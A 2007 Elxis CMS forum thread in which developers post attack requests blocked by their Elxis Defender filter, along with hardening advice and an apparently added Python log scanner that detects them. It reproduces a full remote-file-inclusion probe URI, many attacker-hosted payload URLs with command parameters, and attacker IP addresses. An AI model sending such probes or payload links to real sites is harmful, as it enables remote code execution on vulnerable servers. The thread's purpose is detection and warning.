Topic: Detected by Elxis defender exploits (Read 44485 times)
datahell (Elxis Team, Hero Member, Posts: 10356)
Detected by Elxis defender exploits
on: September 30, 2007, 12:02:44
I saw a dangerous request today in the elxis.org logs and I need to tell everyone again the importance of having register_globals set to off and some PHP functions disabled.
The request (written in 3 lines):
/index.php?topic=996.0//index.php?
_REQUEST=&_REQUEST%5boption%5d=com_login&_REQUEST%5bItemid%5d=1&
GLOBALS=&mosConfig_absolute_path=http://bsnet.web.id/safe.txt?
Exploit: http://bsnet.web.id/safe.txt
Functions used: disk_free_space, shell_exec, exec, system, passthru, popen, getcwd
Last Edit: October 04, 2007, 22:52:00 by datahell
Elxis Team | Is Open Source | IOS Rentals | IOS AERO
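As an added example (not Elxis Defender's own code), here is a small access-log filter in the same spirit as the Defender's mosConfig_ filter: it flags query parameters that try to overwrite PHP superglobals or mosConfig_* settings, and parameter values that point at a remote URL, the two things the request above relies on when register_globals is on. The log lines, client IPs and the attacker.example host are constructed; the request itself is the one from the post.

```python
"""Flag register_globals / remote-include probes in web-server access logs.
Added example in the spirit of Elxis Defender's "mosConfig_" filter, not the Defender's
own code: it reports query parameters that try to overwrite PHP superglobals or
mosConfig_* settings, and values pointing at a remote URL (the two things such a
probe needs when register_globals and allow_url_fopen are on)."""
import re
from urllib.parse import unquote_plus, urlsplit
# Parameter names that must never come from the client.
SUSPICIOUS_PARAM = re.compile(r"^(mosConfig_|_REQUEST|_GET|_POST|_COOKIE|_SERVER|GLOBALS)", re.I)
# A value that is itself a URL: the classic sign of a remote file inclusion attempt.
REMOTE_VALUE = re.compile(r"^(https?|ftp)://", re.I)
# Apache common/combined log line: client IP ... "METHOD URI HTTP/x.y"
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Constructed sample: the request from the post above with a placeholder host.
PROBE_URI = ("/index.php?topic=996.0//index.php?_REQUEST=&_REQUEST%5boption%5d=com_login"
             "&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/safe.txt?")
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Sep/2007:12:02:44 +0300] "GET ' + PROBE_URI + ' HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Sep/2007:12:03:10 +0300] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 8192',
]

def parse_query(uri):
    """Split the query of a request URI into decoded (name, value) pairs; done by hand
    so empty values (GLOBALS=) survive and _REQUEST%5boption%5d compares as _REQUEST[option]."""
    pairs = []
    for part in urlsplit(uri).query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def classify_request(uri):
    """Return the findings for one request URI (empty list when nothing is suspicious)."""
    findings = []
    for name, value in parse_query(uri):
        if SUSPICIOUS_PARAM.match(name):
            findings.append(f"overwrite attempt: {name}")
        if REMOTE_VALUE.match(value):
            findings.append(f"remote include value in {name}: {value}")
    return findings

def scan_log(lines):
    """Return (client_ip, uri, findings) for each log line that triggers a finding."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (findings := classify_request(m.group(2))):
            hits.append((m.group(1), m.group(2), findings))
    return hits
```

Note that the first pair of the probe decodes as topic=996.0//index.php?_REQUEST=, exactly as PHP would see it, so the detection keys on the later decoded names rather than on the raw string.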
c8620p (Full Member, Posts: 119)
Re: Dangerous request
Reply #1 on: September 30, 2007, 22:16:39
OK, but if we set this option to OFF, some of the components may stop working.
Should we always be afraid of something, or will something be safer in the new version (2008)?
On Earth my weight is 70 kgr but on Aries my weight is 27 kgr. I think I live on the wrong planet!
datahell (Elxis Team, Hero Member, Posts: 10356)
Re: Dangerous request
Reply #2 on: September 30, 2007, 23:13:32
ALL Elxis standard and Elxis compatible components work perfectly with register_globals off. Elxis does not need register_globals to be on. In the installation we say that very clearly. Elxis 2006.x and 2008.x are safe enough, but security is not only a matter of the CMS. It is also a matter of the CMS environment. Generally Elxis is very secure.
Elxis 2008.x has some more security enhancements:
1. Option to hide the administration login page!
2. Elxis defender became more effective.
3. Option to log the login attempts to the administration area (successful or not).
4. The whole frontend became more "solid", giving fewer privileges to users.
5. You can control access settings for any part of the administration area.
Ivan Trebješanin (Elxis Team, Hero Member, Posts: 1663)
Re: Dangerous request
Reply #3 on: October 01, 2007, 00:47:02
Quote from: c8620p on September 30, 2007, 22:16:39: "Should we be always afraid ..."
YES! It is wise to be cautious all the time, as you can never know what comes next in someone else's mind. And no CMS can be 100% safe if you leave your dirs or files on 777, or your server is misconfigured, for example. Elxis is the best CMS there ever was regarding security, but hey, there are a lot of pranksters out there, and some of them are smart.
I've got a snap in my finger...
Got rhythm in my walk...
datahell (Elxis Team, Hero Member, Posts: 10356)
Re: Dangerous request
Reply #4 on: October 01, 2007, 07:46:05
Unfortunately there is no 100% secure application. Elxis is strong enough, but we cannot guarantee absolute security. Even elxis.org can theoretically be hacked. For those of you who may not know it, joomla.org was hacked a month ago. As far as I know it was hacked due to a third-party component. The Elxis core is very secure as we continuously work on it, update it and make fixes where needed. Most security problems usually come from third-party applications and an insecure site environment. So, please take a look at these; we take care of Elxis.
c8620p (Full Member, Posts: 119)
Re: Dangerous request
Reply #5 on: October 02, 2007, 01:50:45
Sorry for the earlier post, but I think that I saw somewhere in an installation of a component (for Elxis) that RegisterGlobals MUST be set to ON. Maybe I'm wrong. In the meantime, thank you for your answer.
datahell (Elxis Team, Hero Member, Posts: 10356)
Re: Dangerous request
Reply #6 on: October 03, 2007, 14:39:02
A new exploit/attack detected by Elxis Defender.
ATTACKER IP ADDRESS: 81.215.251.202
Country: Turkey (Izmir)
Exploit: http://animaliitaliani.com/x.dat?list=1&cmd=id (hosted in Italy)
Also here: http://georgiaeliteallstars.com/tool20.dat?list=1&cmd=id (hosted in USA)
DATE: 03-10-2007 01:56:57
Notice: The new Elxis Defender also sends you the requested URI (if you have enabled e-mail notifications).
Last Edit: October 05, 2007, 22:23:03 by datahell
datahell (Elxis Team, Hero Member, Posts: 10356)
New exploit detected
Reply #7 on: October 04, 2007, 22:51:24
New exploit detected by Elxis defender
ATTACKER IP ADDRESS: 85.25.30.127
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Germany
EXPLOIT: http://pastebin.ca/raw/725499? (hosted in Canada)
DATE: 04-10-2007 22:08:01
Notice: If you wish to have the new version of Elxis Defender (available in Elxis 2008.x) now, send me a PM and I will send you the new version.
I will ONLY accept requests from:
- Elxis Team members
- Elxis community members
- People having support contracts with GO UP Inc
- GO UP Inc's affiliates and partners.
Last Edit: October 05, 2007, 22:15:59 by datahell
datahell (Elxis Team, Hero Member, Posts: 10356)
Re: Detected by Elxis defender exploits
Reply #8 on: October 05, 2007, 14:59:40
ATTACKER IP ADDRESS: 217.65.240.14
Country: Ukraine (LVIVSKA OBLAST)
Exploit:
http://usuarios.arnet.com.ar/larry123/safe.txt?
(hosted in Argentina)
DATE: 05-10-2007 07:22:09
Last Edit: October 05, 2007, 22:24:12 by datahell
datahell (Elxis Team, Hero Member, Posts: 10356)
Re: Detected by Elxis defender exploits
Reply #9 on: October 05, 2007, 18:48:55
ATTACKER IP ADDRESS: 207.150.191.62
Country: United States (California, Dixon)
Exploit:
http://www.brandy-rose.com/members/id.txt?
(hosted in USA)
DATE: 05-10-2007 18:11:05
Last Edit: October 05, 2007, 22:25:53 by datahell
datahell (Elxis Team, Hero Member, Posts: 10356)
Re: Detected by Elxis defender exploits
Reply #10 on: October 05, 2007, 21:58:58
ATTACKER IP ADDRESS: 209.59.205.211
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mmsblog (joomla)
COUNTRY: United States (Washington, Bellevue)
EXPLOIT:
http://www.kadastra.com/de/ec.txt?
(hosted in Bulgaria)
DATE: 05-10-2007 21:19:15
Last Edit: October 05, 2007, 22:25:03 by datahell
datahell (Elxis Team, Hero Member, Posts: 10356)
Re: Detected by Elxis defender exploits
Reply #11 on: October 05, 2007, 22:21:31
ATTACKER IP ADDRESS: 74.86.55.194
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_serverstat (joomla)
COUNTRY: USA (Illinois, Chicago)
EXPLOIT:
http://www.brandy-rose.com/members/id.txt?
(hosted in USA)
DATE: 05-10-2007 22:04:48
datahell (Elxis Team, Hero Member, Posts: 10356)
Re: Detected by Elxis defender exploits
Reply #12 on: October 06, 2007, 09:12:35
ATTACKER IP ADDRESS: 67.18.228.34
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mtree
COUNTRY: USA (Texas, Dallas)
EXPLOIT:
http://tric.or.id/id.txt?
(hosted in Indonesia)
DATE: 06-10-2007 02:10:04
ATTACKER IP ADDRESS: 81.214.175.110
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Turkey (Izmir)
EXPLOIT:
http://animaliitaliani.com/x.dat?list=1&cmd=id
(hosted in Italy)
DATE: 06-10-2007 07:22:54
datahell (Elxis Team, Hero Member, Posts: 10356)
Re: Detected by Elxis defender exploits
Reply #13 on: October 17, 2007, 14:45:54
From the kind of attacks Elxis defender blocks daily we see software that is possibly vulnerable.
So, here are 3 joomla extensions with security problems:
- module: astatspro_show_2
- bot: multithumb
- component: ricettario (vulnerable in the backend too!)
We also have many attacks on the component mtree and especially on the savant files (there is an elxis version available).
Having register_globals off, allow_url_fopen off or mosConfig set as a filter in Elxis defender (version 2008) makes these attacks useless.
New exploits:
http://futurehousingsystems.com/images/control.txt
http://www.dunakom.hu/userimages/id.txt
http://www.cityvoice.biz/shop/pub/_vti/safe.txt
http://www.canalhip-hop.kit.net/id.txt
ftp://132.203.200.248 ( /nod32/new )
Last Edit: October 17, 2007, 18:36:22 by datahell
nikos65 (Hero Member, Posts: 1043)
Re: Detected by Elxis defender exploits
Reply #14 on: October 21, 2007, 08:59:52
Continuous attacks at www[dot]hotel-astoria[dot]gr today
#  IP            Date                              Filters
1  66.135.32.79  Sunday, 21 October 2007 07:38:18  mosConfig_
2  216.22.3.3    Sunday, 21 October 2007 07:42:04  mosConfig_
3  211.202.2.55  Sunday, 21 October 2007 08:08:58  mosConfig_
Two from the USA and one from Korea.
I grow old ever learning
www.dallas.gr | www.igoumenitsahotels.com